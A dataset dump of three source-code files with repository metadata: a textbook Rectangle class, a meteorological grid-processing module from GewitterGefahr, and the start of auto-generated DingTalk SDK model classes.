blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
533149ed9a8326403f4b55c07064105b91edd0f3 | 11b503cd75f546465eb7d7e436f88587a0fa8596 | /calculating_area.py | 618867a889ea6bfff8a28d94fcf0c46859bf78f1 | [] | no_license | ibnahmadCoded/how_to_think_like_a_computer_scientist_Chapter_11 | d36074d71f5df92dfab864e827ba0968ee10d07e | e3fa08a5b64b62700a9590e2fff3c5c2d762a6f8 | refs/heads/master | 2022-04-17T01:30:57.788470 | 2020-04-15T20:08:11 | 2020-04-15T20:08:11 | 256,024,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | from study import *
class Rectangle:
""" A class to manufacture rectangle objects """
def __init__(self, posn, w, h):
""" Initialize rectangle at posn, with width w, height h """
self.corner = posn
self.width = w
self.height = h
def __str__(self):
return "({0}, {1}, {2})".format(self.corner, self.width,
self.height)
def grow(self, delta_width, delta_height):
""" Grow (or shrink) this object by the deltas """
self.width += delta_width
self.height += delta_height
def move(self, dx, dy):
""" Move this object by the deltas """
self.corner.x += dx
self.corner.y += dy
def area(self):
"""Returns area of rectangle object"""
return self.width * self.height
| [
"alegeaa@yahoo.com"
] | alegeaa@yahoo.com |
55d10f08476cafe3b6a8acb282b1442abec586be | f41471a3bff66c763b8d60f0280ac67235ecbb62 | /gewittergefahr/gg_utils/grids.py | 86d7c33b62c1998a09b3280b4341deb136f8433a | [
"MIT"
] | permissive | cil0834/GewitterGefahr | 0f43878ba40921881c077c2218446f5fab18ba9f | 699b995b1b90344022b1644d4b758e790402894e | refs/heads/master | 2020-06-23T15:59:22.718914 | 2019-07-24T03:59:31 | 2019-07-24T03:59:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,443 | py | """Processing methods for gridded data.
DEFINITIONS
"Grid point" = center of grid cell (as opposed to edges of the grid cell).
"""
import numpy
from gewittergefahr.gg_utils import general_utils
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import projections
from gewittergefahr.gg_utils import error_checking
DEGREES_LAT_TO_METRES = 60 * 1852
DEGREES_TO_RADIANS = numpy.pi / 180
GRID_POINT_X_MATRIX_KEY = 'grid_point_x_matrix_metres'
GRID_POINT_Y_MATRIX_KEY = 'grid_point_y_matrix_metres'
PROJECTION_OBJECT_KEY = 'projection_object'
def _check_input_events(
event_x_coords_metres, event_y_coords_metres, integer_event_ids):
"""Checks inputs to `count_events_on_equidistant_grid`.
:param event_x_coords_metres: See doc for
`count_events_on_equidistant_grid`.
:param event_y_coords_metres: Same.
:param integer_event_ids: Same.
"""
error_checking.assert_is_numpy_array_without_nan(event_x_coords_metres)
error_checking.assert_is_numpy_array(
event_x_coords_metres, num_dimensions=1)
num_events = len(event_x_coords_metres)
error_checking.assert_is_numpy_array_without_nan(event_y_coords_metres)
error_checking.assert_is_numpy_array(
event_y_coords_metres, exact_dimensions=numpy.array([num_events]))
if integer_event_ids is not None:
error_checking.assert_is_integer_numpy_array(integer_event_ids)
error_checking.assert_is_numpy_array(
integer_event_ids, exact_dimensions=numpy.array([num_events]))
def get_xy_grid_points(x_min_metres=None, y_min_metres=None,
x_spacing_metres=None, y_spacing_metres=None,
num_rows=None, num_columns=None):
"""Generates unique x- and y-coords of grid points in regular x-y grid.
M = number of rows in grid
N = number of columns in grid
:param x_min_metres: Minimum x-coordinate over all grid points.
:param y_min_metres: Minimum y-coordinate over all grid points.
:param x_spacing_metres: Spacing between adjacent grid points in x-
direction. Alternate interpretation: length of each grid cell in x-
direction.
:param y_spacing_metres: Spacing between adjacent grid points in y-
direction. Alternate interpretation: length of each grid cell in y-
direction.
:param num_rows: Number of rows (unique grid-point y-values) in grid.
:param num_columns: Number of columns (unique grid-point x-values) in grid.
:return: grid_point_x_metres: length-N numpy array with x-coordinates of
grid points.
:return: grid_point_y_metres: length-M numpy array with y-coordinates of
grid points.
"""
error_checking.assert_is_not_nan(x_min_metres)
error_checking.assert_is_not_nan(y_min_metres)
error_checking.assert_is_greater(x_spacing_metres, 0.)
error_checking.assert_is_greater(y_spacing_metres, 0.)
error_checking.assert_is_integer(num_rows)
error_checking.assert_is_greater(num_rows, 0)
error_checking.assert_is_integer(num_columns)
error_checking.assert_is_greater(num_columns, 0)
x_max_metres = x_min_metres + (num_columns - 1) * x_spacing_metres
y_max_metres = y_min_metres + (num_rows - 1) * y_spacing_metres
grid_point_x_metres = numpy.linspace(x_min_metres, x_max_metres,
num=num_columns)
grid_point_y_metres = numpy.linspace(y_min_metres, y_max_metres,
num=num_rows)
return grid_point_x_metres, grid_point_y_metres
def get_latlng_grid_points(min_latitude_deg=None, min_longitude_deg=None,
lat_spacing_deg=None, lng_spacing_deg=None,
num_rows=None, num_columns=None):
"""Generates unique lat and long of grid points in regular lat-long grid.
M = number of rows in grid
N = number of columns in grid
:param min_latitude_deg: Minimum latitude over all grid points (deg N).
:param min_longitude_deg: Minimum longitude over all grid points (deg E).
:param lat_spacing_deg: Meridional spacing between adjacent grid points.
Alternate interpretation: length of each grid cell in N-S direction.
:param lng_spacing_deg: Zonal spacing between adjacent grid points.
Alternate interpretation: length of each grid cell in E-W direction.
:param num_rows: Number of rows (unique grid-point latitudes) in grid.
:param num_columns: Number of columns (unique grid-point longitudes) in
grid.
:return: grid_point_latitudes_deg: length-M numpy array with latitudes of
grid points (deg N).
:return: grid_point_longitudes_deg: length-N numpy array with longitudes of
grid points (deg E).
"""
error_checking.assert_is_valid_latitude(min_latitude_deg)
min_longitude_deg = lng_conversion.convert_lng_positive_in_west(
min_longitude_deg, allow_nan=False)
error_checking.assert_is_greater(lat_spacing_deg, 0.)
error_checking.assert_is_greater(lng_spacing_deg, 0.)
error_checking.assert_is_integer(num_rows)
error_checking.assert_is_greater(num_rows, 0)
error_checking.assert_is_integer(num_columns)
error_checking.assert_is_greater(num_columns, 0)
max_latitude_deg = min_latitude_deg + (num_rows - 1) * lat_spacing_deg
max_longitude_deg = min_longitude_deg + (num_columns - 1) * lng_spacing_deg
grid_point_latitudes_deg = numpy.linspace(min_latitude_deg,
max_latitude_deg, num=num_rows)
grid_point_longitudes_deg = numpy.linspace(min_longitude_deg,
max_longitude_deg,
num=num_columns)
return grid_point_latitudes_deg, grid_point_longitudes_deg
def get_xy_grid_cell_edges(x_min_metres=None, y_min_metres=None,
x_spacing_metres=None, y_spacing_metres=None,
num_rows=None, num_columns=None):
"""Generates unique x- and y-coords of grid-cell edges in regular x-y grid.
M = number of rows in grid
N = number of columns in grid
:param x_min_metres: See documentation for get_xy_grid_points.
:param y_min_metres: See documentation for get_xy_grid_points.
:param x_spacing_metres: See documentation for get_xy_grid_points.
:param y_spacing_metres: See documentation for get_xy_grid_points.
:param num_rows: See documentation for get_xy_grid_points.
:param num_columns: See documentation for get_xy_grid_points.
:return: grid_cell_edge_x_metres: length-(N + 1) numpy array with x-
coordinates of grid points.
:return: grid_cell_edge_y_metres: length-(M + 1) numpy array with y-
coordinates of grid points.
"""
grid_point_x_metres, grid_point_y_metres = get_xy_grid_points(
x_min_metres=x_min_metres, y_min_metres=y_min_metres,
x_spacing_metres=x_spacing_metres, y_spacing_metres=y_spacing_metres,
num_rows=num_rows, num_columns=num_columns)
grid_cell_edge_x_metres = numpy.concatenate((
grid_point_x_metres - x_spacing_metres / 2,
grid_point_x_metres[[-1]] + x_spacing_metres / 2))
grid_cell_edge_y_metres = numpy.concatenate((
grid_point_y_metres - y_spacing_metres / 2,
grid_point_y_metres[[-1]] + y_spacing_metres / 2))
return grid_cell_edge_x_metres, grid_cell_edge_y_metres
def get_latlng_grid_cell_edges(min_latitude_deg=None, min_longitude_deg=None,
lat_spacing_deg=None, lng_spacing_deg=None,
num_rows=None, num_columns=None):
"""Generates unique lat and lng of grid-cell edges in regular lat-lng grid.
M = number of rows in grid
N = number of columns in grid
:param min_latitude_deg: See documentation for get_latlng_grid_points.
:param min_longitude_deg: See documentation for get_latlng_grid_points.
:param lat_spacing_deg: See documentation for get_latlng_grid_points.
:param lng_spacing_deg: See documentation for get_latlng_grid_points.
:param num_rows: See documentation for get_latlng_grid_points.
:param num_columns: See documentation for get_latlng_grid_points.
:return: grid_cell_edge_latitudes_deg: length-(M + 1) numpy array with
latitudes of grid-cell edges (deg N).
:return: grid_cell_edge_longitudes_deg: length-(N + 1) numpy array with
longitudes of grid-cell edges (deg E).
"""
(grid_point_latitudes_deg,
grid_point_longitudes_deg) = get_latlng_grid_points(
min_latitude_deg=min_latitude_deg, min_longitude_deg=min_longitude_deg,
lat_spacing_deg=lat_spacing_deg, lng_spacing_deg=lng_spacing_deg,
num_rows=num_rows, num_columns=num_columns)
grid_cell_edge_latitudes_deg = numpy.concatenate((
grid_point_latitudes_deg - lat_spacing_deg / 2,
grid_point_latitudes_deg[[-1]] + lat_spacing_deg / 2))
grid_cell_edge_longitudes_deg = numpy.concatenate((
grid_point_longitudes_deg - lng_spacing_deg / 2,
grid_point_longitudes_deg[[-1]] + lng_spacing_deg / 2))
return grid_cell_edge_latitudes_deg, grid_cell_edge_longitudes_deg
def xy_vectors_to_matrices(x_unique_metres, y_unique_metres):
"""For regular x-y grid, converts vectors of x- and y-coords to matrices.
This method works for coordinates of either grid points or grid-cell edges.
M = number of rows in grid
N = number of columns in grid
:param x_unique_metres: length-N numpy array with x-coordinates of either
grid points or grid-cell edges.
:param y_unique_metres: length-M numpy array with y-coordinates of either
grid points or grid-cell edges.
:return: x_matrix_metres: M-by-N numpy array, where x_matrix_metres[*, j] =
x_unique_metres[j]. Each row in this matrix is the same.
:return: y_matrix_metres: M-by-N numpy array, where y_matrix_metres[i, *] =
y_unique_metres[i]. Each column in this matrix is the same.
"""
error_checking.assert_is_numpy_array_without_nan(x_unique_metres)
error_checking.assert_is_numpy_array(x_unique_metres, num_dimensions=1)
error_checking.assert_is_numpy_array_without_nan(y_unique_metres)
error_checking.assert_is_numpy_array(y_unique_metres, num_dimensions=1)
return numpy.meshgrid(x_unique_metres, y_unique_metres)
def latlng_vectors_to_matrices(unique_latitudes_deg, unique_longitudes_deg):
"""Converts vectors of lat and long coordinates to matrices.
This method works only for a regular lat-long grid. Works for coordinates
of either grid points or grid-cell edges.
M = number of rows in grid
N = number of columns in grid
:param unique_latitudes_deg: length-M numpy array with latitudes (deg N) of
either grid points or grid-cell edges.
:param unique_longitudes_deg: length-N numpy array with longitudes (deg E)
of either grid points or grid-cell edges.
:return: latitude_matrix_deg: M-by-N numpy array, where
latitude_matrix_deg[i, *] = unique_latitudes_deg[i]. Each column in
this matrix is the same.
:return: longitude_matrix_deg: M-by-N numpy array, where
longitude_matrix_deg[*, j] = unique_longitudes_deg[j]. Each row in this
matrix is the same.
"""
error_checking.assert_is_valid_lat_numpy_array(unique_latitudes_deg)
error_checking.assert_is_numpy_array(unique_latitudes_deg, num_dimensions=1)
error_checking.assert_is_numpy_array(unique_longitudes_deg,
num_dimensions=1)
unique_longitudes_deg = lng_conversion.convert_lng_positive_in_west(
unique_longitudes_deg, allow_nan=False)
(longitude_matrix_deg, latitude_matrix_deg) = numpy.meshgrid(
unique_longitudes_deg, unique_latitudes_deg)
return latitude_matrix_deg, longitude_matrix_deg
def xy_field_grid_points_to_edges(field_matrix=None, x_min_metres=None,
y_min_metres=None, x_spacing_metres=None,
y_spacing_metres=None):
"""Re-references x-y field from grid points to edges.
M = number of rows (unique grid-point x-coordinates)
N = number of columns (unique grid-point y-coordinates)
:param field_matrix: M-by-N numpy array with values of some variable
(examples: temperature, radar reflectivity, etc.). y should increase
while traveling down a column, and x should increase while traveling
right across a row.
:param x_min_metres: Minimum x-coordinate over all grid points.
:param y_min_metres: Minimum y-coordinate over all grid points.
:param x_spacing_metres: Spacing between adjacent grid points in x-
direction.
:param y_spacing_metres: Spacing between adjacent grid points in y-
direction.
:return: field_matrix: Same as input, except that dimensions are now (M + 1)
by (N + 1). The last row and last column contain only NaN's.
:return: grid_cell_edge_x_metres: length-(N + 1) numpy array with x-
coordinates of grid-cell edges.
:return: grid_cell_edge_y_metres: length-(M + 1) numpy array with y-
coordinates of grid-cell edges.
"""
error_checking.assert_is_real_numpy_array(field_matrix)
error_checking.assert_is_numpy_array(field_matrix, num_dimensions=2)
num_rows = field_matrix.shape[0]
num_columns = field_matrix.shape[1]
grid_cell_edge_x_metres, grid_cell_edge_y_metres = get_xy_grid_cell_edges(
x_min_metres=x_min_metres, y_min_metres=y_min_metres,
x_spacing_metres=x_spacing_metres, y_spacing_metres=y_spacing_metres,
num_rows=num_rows, num_columns=num_columns)
nan_row = numpy.full((1, num_columns), numpy.nan)
field_matrix = numpy.vstack((field_matrix, nan_row))
nan_column = numpy.full((num_rows + 1, 1), numpy.nan)
field_matrix = numpy.hstack((field_matrix, nan_column))
return field_matrix, grid_cell_edge_x_metres, grid_cell_edge_y_metres
def latlng_field_grid_points_to_edges(
field_matrix=None, min_latitude_deg=None, min_longitude_deg=None,
lat_spacing_deg=None, lng_spacing_deg=None):
"""Re-references lat-long field from grid points to edges.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with values of some variable
(examples: temperature, radar reflectivity, etc.). Latitude should
increase while traveling down a column, and longitude should increase
while traveling right across a row.
:param min_latitude_deg: See documentation for get_latlng_grid_points.
:param min_longitude_deg: See documentation for get_latlng_grid_points.
:param lat_spacing_deg: See documentation for get_latlng_grid_points.
:param lng_spacing_deg: See documentation for get_latlng_grid_points.
:param num_rows: See documentation for get_latlng_grid_points.
:param num_columns: See documentation for get_latlng_grid_points.
:return: field_matrix: Same as input, except that dimensions are now (M + 1)
by (N + 1). The last row and last column contain only NaN's.
:return: grid_cell_edge_latitudes_deg: length-(M + 1) numpy array with
latitudes of grid-cell edges (deg N).
:return: grid_cell_edge_longitudes_deg: length-(N + 1) numpy array with
longitudes of grid-cell edges (deg E).
"""
error_checking.assert_is_real_numpy_array(field_matrix)
error_checking.assert_is_numpy_array(field_matrix, num_dimensions=2)
num_rows = field_matrix.shape[0]
num_columns = field_matrix.shape[1]
(grid_cell_edge_latitudes_deg,
grid_cell_edge_longitudes_deg) = get_latlng_grid_cell_edges(
min_latitude_deg=min_latitude_deg, min_longitude_deg=min_longitude_deg,
lat_spacing_deg=lat_spacing_deg, lng_spacing_deg=lng_spacing_deg,
num_rows=num_rows, num_columns=num_columns)
nan_row = numpy.full((1, num_columns), numpy.nan)
field_matrix = numpy.vstack((field_matrix, nan_row))
nan_column = numpy.full((num_rows + 1, 1), numpy.nan)
field_matrix = numpy.hstack((field_matrix, nan_column))
return (field_matrix, grid_cell_edge_latitudes_deg,
grid_cell_edge_longitudes_deg)
def extract_latlng_subgrid(
data_matrix, grid_point_latitudes_deg, grid_point_longitudes_deg,
center_latitude_deg, center_longitude_deg,
max_distance_from_center_metres):
"""Extracts subset of lat-long grid, centered at a given point.
M = number of rows (grid-point latitudes) in full grid
N = number of columns (grid-point longitudes) in full grid
m = number of rows (grid-point latitudes) in sub-grid
n = number of columns (grid-point longitudes) in sub-grid
:param data_matrix: M-by-N numpy array with data values.
:param grid_point_latitudes_deg: length-M numpy array of grid-point
latitudes (deg N). grid_point_latitudes_deg[i] is the latitude
everywhere in the [i]th row of data_matrix.
:param grid_point_longitudes_deg: length-M numpy array of grid-point
latitudes (deg E). grid_point_longitudes_deg[j] is the longitude
everywhere in the [j]th column of data_matrix.
:param center_latitude_deg: Latitude (deg N) of target point, around which
the sub-grid will be centered.
:param center_longitude_deg: Longitude (deg E) of target point, around which
the sub-grid will be centered.
:param max_distance_from_center_metres: Max distance of any grid point from
target point. Values at more distant grid points will be changed to
NaN.
:return: subgrid_matrix: m-by-n numpy array with data values.
:return: rows_in_full_grid: length-m numpy array. If rows_in_full_grid[i]
= k, the [i]th row in the subgrid = [k]th row in the full grid.
"""
max_latitude_diff_deg = (
max_distance_from_center_metres / DEGREES_LAT_TO_METRES
)
degrees_lng_to_metres = DEGREES_LAT_TO_METRES * numpy.cos(
center_latitude_deg * DEGREES_TO_RADIANS
)
max_longitude_diff_deg = (
max_distance_from_center_metres / degrees_lng_to_metres
)
min_latitude_deg = center_latitude_deg - max_latitude_diff_deg
max_latitude_deg = center_latitude_deg + max_latitude_diff_deg
min_longitude_deg = center_longitude_deg - max_longitude_diff_deg
max_longitude_deg = center_longitude_deg + max_longitude_diff_deg
valid_row_flags = numpy.logical_and(
grid_point_latitudes_deg >= min_latitude_deg,
grid_point_latitudes_deg <= max_latitude_deg)
valid_row_indices = numpy.where(valid_row_flags)[0]
min_valid_row_index = numpy.min(valid_row_indices)
max_valid_row_index = numpy.max(valid_row_indices)
valid_column_flags = numpy.logical_and(
grid_point_longitudes_deg >= min_longitude_deg,
grid_point_longitudes_deg <= max_longitude_deg)
valid_column_indices = numpy.where(valid_column_flags)[0]
min_valid_column_index = numpy.min(valid_column_indices)
max_valid_column_index = numpy.max(valid_column_indices)
subgrid_data_matrix = data_matrix[
min_valid_row_index:(max_valid_row_index + 1),
min_valid_column_index:(max_valid_column_index + 1)
]
subgrid_lat_matrix_deg, subgrid_lng_matrix_deg = (
latlng_vectors_to_matrices(
unique_latitudes_deg=grid_point_latitudes_deg[valid_row_indices],
unique_longitudes_deg=grid_point_longitudes_deg[
valid_column_indices]
)
)
lat_distance_matrix_metres = DEGREES_LAT_TO_METRES * (
subgrid_lat_matrix_deg - center_latitude_deg
)
lng_distance_matrix_metres = degrees_lng_to_metres * (
subgrid_lng_matrix_deg - center_longitude_deg
)
distance_matrix_metres = numpy.sqrt(
lat_distance_matrix_metres ** 2 + lng_distance_matrix_metres ** 2
)
subgrid_data_matrix[
distance_matrix_metres > max_distance_from_center_metres
] = numpy.nan
return subgrid_data_matrix, valid_row_indices, valid_column_indices
def count_events_on_equidistant_grid(
event_x_coords_metres, event_y_coords_metres,
grid_point_x_coords_metres, grid_point_y_coords_metres,
integer_event_ids=None, effective_radius_metres=None):
"""Counts number of events in, or near, each cell of an equidistant grid.
M = number of rows (unique grid-point y-coordinates)
N = number of columns (unique grid-point x-coordinates)
K = number of events
:param event_x_coords_metres: length-K numpy array with x-coordinates of
events.
:param event_y_coords_metres: length-K numpy array with y-coordinates of
events.
:param grid_point_x_coords_metres: length-N numpy array with unique
x-coordinates at grid points.
:param grid_point_y_coords_metres: length-M numpy array with unique
y-coordinates at grid points.
:param integer_event_ids: length-K numpy array of event IDs (integers).
Each event ID will be counted only once per grid cell. If
`event_ids is None`, will assume that each location in
`event_x_coords_metres` and `event_y_coords_metres` comes from a unique
event.
:param effective_radius_metres: If None, will count the number of events
inside each grid cell. If specified, will count the number of events
within `effective_radius_metres` of each grid point.
:return: num_events_matrix:
[if `effective_radius_metres is None`]
M-by-N numpy array, where element [i, j] is the number of events in grid
cell [i, j].
[if `effective_radius_metres is not None`]
M-by-N numpy array, where element [i, j] is the number of events within
`effective_radius_metres` of grid point [i, j].
:return: event_ids_by_grid_cell_dict: Dictionary, where key [i, j] is a 1-D
numpy array of event IDs assigned to grid cell [i, j]. If
`event_ids is None`, this will also be `None`.
"""
_check_input_events(
event_x_coords_metres=event_x_coords_metres,
event_y_coords_metres=event_y_coords_metres,
integer_event_ids=integer_event_ids)
error_checking.assert_is_numpy_array_without_nan(grid_point_x_coords_metres)
error_checking.assert_is_numpy_array(
grid_point_x_coords_metres, num_dimensions=1)
error_checking.assert_is_numpy_array_without_nan(grid_point_y_coords_metres)
error_checking.assert_is_numpy_array(
grid_point_y_coords_metres, num_dimensions=1)
if effective_radius_metres is not None:
error_checking.assert_is_greater(effective_radius_metres, 0.)
effective_radius_metres2 = effective_radius_metres ** 2
(grid_point_x_matrix_metres, grid_point_y_matrix_metres
) = xy_vectors_to_matrices(x_unique_metres=grid_point_x_coords_metres,
y_unique_metres=grid_point_y_coords_metres)
num_grid_rows = len(grid_point_y_coords_metres)
num_grid_columns = len(grid_point_x_coords_metres)
num_events_matrix = numpy.full(
(num_grid_rows, num_grid_columns), 0, dtype=int)
if integer_event_ids is None:
event_ids_by_grid_cell_dict = None
else:
event_ids_by_grid_cell_dict = {}
for i in range(num_grid_rows):
for j in range(num_grid_columns):
event_ids_by_grid_cell_dict[i, j] = []
num_events = len(event_x_coords_metres)
for k in range(num_events):
if numpy.mod(k, 1000) == 0:
print('Have assigned {0:d} of {1:d} events to grid cells...'.format(
k, num_events))
if effective_radius_metres is None:
_, this_row = general_utils.find_nearest_value(
grid_point_y_coords_metres, event_y_coords_metres[k])
_, this_column = general_utils.find_nearest_value(
grid_point_x_coords_metres, event_x_coords_metres[k])
if integer_event_ids is None:
num_events_matrix[this_row, this_column] += 1
else:
event_ids_by_grid_cell_dict[this_row, this_column].append(
integer_event_ids[k])
continue
these_rows_to_try = numpy.where(numpy.absolute(
grid_point_y_coords_metres - event_y_coords_metres[k]
) <= effective_radius_metres)[0]
these_columns_to_try = numpy.where(numpy.absolute(
grid_point_x_coords_metres - event_x_coords_metres[k]
) <= effective_radius_metres)[0]
this_x_submatrix_metres = grid_point_x_matrix_metres[
these_rows_to_try[:, None], these_columns_to_try]
this_y_submatrix_metres = grid_point_y_matrix_metres[
these_rows_to_try[:, None], these_columns_to_try]
this_distance_submatrix_metres2 = (
(this_x_submatrix_metres - event_x_coords_metres[k]) ** 2 +
(this_y_submatrix_metres - event_y_coords_metres[k]) ** 2)
these_subrows, these_subcolumns = numpy.where(
this_distance_submatrix_metres2 <= effective_radius_metres2)
these_rows = these_rows_to_try[these_subrows]
these_columns = these_columns_to_try[these_subcolumns]
if integer_event_ids is None:
num_events_matrix[these_rows, these_columns] += 1
else:
for m in range(len(these_rows)):
event_ids_by_grid_cell_dict[
these_rows[m], these_columns[m]
].append(integer_event_ids[k])
print('Have assigned all {0:d} events to grid cells!'.format(num_events))
if integer_event_ids is not None:
for i in range(num_grid_rows):
for j in range(num_grid_columns):
event_ids_by_grid_cell_dict[i, j] = numpy.array(
list(set(event_ids_by_grid_cell_dict[i, j])), dtype=int)
num_events_matrix[i, j] = len(event_ids_by_grid_cell_dict[i, j])
return num_events_matrix, event_ids_by_grid_cell_dict
def get_latlng_grid_points_in_radius(
test_latitude_deg, test_longitude_deg, effective_radius_metres,
grid_point_latitudes_deg=None, grid_point_longitudes_deg=None,
grid_point_dict=None):
"""Finds lat-long grid points within radius of test point.
One of the following sets of input args must be specified:
- grid_point_latitudes_deg and grid_point_longitudes_deg
- grid_point_dict
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
K = number of grid points within radius of test point
:param test_latitude_deg: Latitude (deg N) of test point.
:param test_longitude_deg: Longitude (deg E) of test point.
:param effective_radius_metres: Effective radius (will find all grid points
within this radius of test point).
:param grid_point_latitudes_deg: length-M numpy array with latitudes (deg N)
of grid points.
:param grid_point_longitudes_deg: length-N numpy array with longitudes
(deg E) of grid points.
:param grid_point_dict: Dictionary created by a previous run of this method
(see output documentation).
:return: rows_in_radius: length-K numpy array with row indices of grid
points near test point.
:return: columns_in_radius: Same but for columns.
:return: grid_point_dict: Dictionary with the following keys.
grid_point_dict['grid_point_x_matrix_metres']: M-by-N numpy array with
x-coordinates of grid points.
grid_point_dict['grid_point_y_matrix_metres']: M-by-N numpy array with
y-coordinates of grid points.
grid_point_dict['projection_object']: Instance of `pyproj.Proj`, which can
be used to convert future test points from lat-long to x-y coordinates.
"""
if grid_point_dict is None:
(grid_point_lat_matrix_deg, grid_point_lng_matrix_deg
) = latlng_vectors_to_matrices(
unique_latitudes_deg=grid_point_latitudes_deg,
unique_longitudes_deg=grid_point_longitudes_deg)
projection_object = projections.init_azimuthal_equidistant_projection(
central_latitude_deg=numpy.mean(grid_point_latitudes_deg),
central_longitude_deg=numpy.mean(grid_point_longitudes_deg))
(grid_point_x_matrix_metres, grid_point_y_matrix_metres
) = projections.project_latlng_to_xy(
latitudes_deg=grid_point_lat_matrix_deg,
longitudes_deg=grid_point_lng_matrix_deg,
projection_object=projection_object)
grid_point_dict = {
GRID_POINT_X_MATRIX_KEY: grid_point_x_matrix_metres,
GRID_POINT_Y_MATRIX_KEY: grid_point_y_matrix_metres,
PROJECTION_OBJECT_KEY: projection_object
}
error_checking.assert_is_valid_latitude(test_latitude_deg)
error_checking.assert_is_geq(effective_radius_metres, 0.)
test_longitude_deg = lng_conversion.convert_lng_positive_in_west(
longitudes_deg=numpy.array([test_longitude_deg]), allow_nan=False)[0]
(test_x_coords_metres, test_y_coords_metres
) = projections.project_latlng_to_xy(
latitudes_deg=numpy.array([test_latitude_deg]),
longitudes_deg=numpy.array([test_longitude_deg]),
projection_object=grid_point_dict[PROJECTION_OBJECT_KEY])
test_x_coord_metres = test_x_coords_metres[0]
test_y_coord_metres = test_y_coords_metres[0]
valid_x_flags = numpy.absolute(
grid_point_dict[GRID_POINT_X_MATRIX_KEY] - test_x_coord_metres
) <= effective_radius_metres
valid_y_flags = numpy.absolute(
grid_point_dict[GRID_POINT_Y_MATRIX_KEY] - test_y_coord_metres
) <= effective_radius_metres
rows_to_try, columns_to_try = numpy.where(numpy.logical_and(
valid_x_flags, valid_y_flags))
distances_to_try_metres = numpy.sqrt(
(grid_point_dict[GRID_POINT_X_MATRIX_KEY][rows_to_try, columns_to_try] -
test_x_coord_metres) ** 2 +
(grid_point_dict[GRID_POINT_Y_MATRIX_KEY][rows_to_try, columns_to_try] -
test_y_coord_metres) ** 2)
valid_indices = numpy.where(
distances_to_try_metres <= effective_radius_metres)[0]
return (rows_to_try[valid_indices], columns_to_try[valid_indices],
grid_point_dict)
| [
"ryan.lagerquist@ou.edu"
] | ryan.lagerquist@ou.edu |
24de53dffd739ed57c77fd62b1677df51626a41a | 29b6a856a81a47ebab7bfdba7fe8a7b845123c9e | /dingtalk/python/alibabacloud_dingtalk/storage_2_0/models.py | 2360bec5165bb4960cbddf11ed58797cd78577d6 | [
"Apache-2.0"
] | permissive | aliyun/dingtalk-sdk | f2362b6963c4dbacd82a83eeebc223c21f143beb | 586874df48466d968adf0441b3086a2841892935 | refs/heads/master | 2023-08-31T08:21:14.042410 | 2023-08-30T08:18:22 | 2023-08-30T08:18:22 | 290,671,707 | 22 | 9 | null | 2021-08-12T09:55:44 | 2020-08-27T04:05:39 | PHP | UTF-8 | Python | false | false | 89,290 | py | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List
class DentryAppPropertiesValue(TeaModel):
def __init__(
self,
name: str = None,
value: str = None,
visibility: str = None,
):
self.name = name
self.value = value
self.visibility = visibility
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
if self.value is not None:
result['value'] = self.value
if self.visibility is not None:
result['visibility'] = self.visibility
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
if m.get('value') is not None:
self.value = m.get('value')
if m.get('visibility') is not None:
self.visibility = m.get('visibility')
return self
class AddPermissionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class AddPermissionRequestMembers(TeaModel):
def __init__(
self,
corp_id: str = None,
id: str = None,
type: str = None,
):
self.corp_id = corp_id
self.id = id
self.type = type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.id is not None:
result['id'] = self.id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class AddPermissionRequestOption(TeaModel):
def __init__(
self,
duration: int = None,
):
self.duration = duration
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.duration is not None:
result['duration'] = self.duration
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('duration') is not None:
self.duration = m.get('duration')
return self
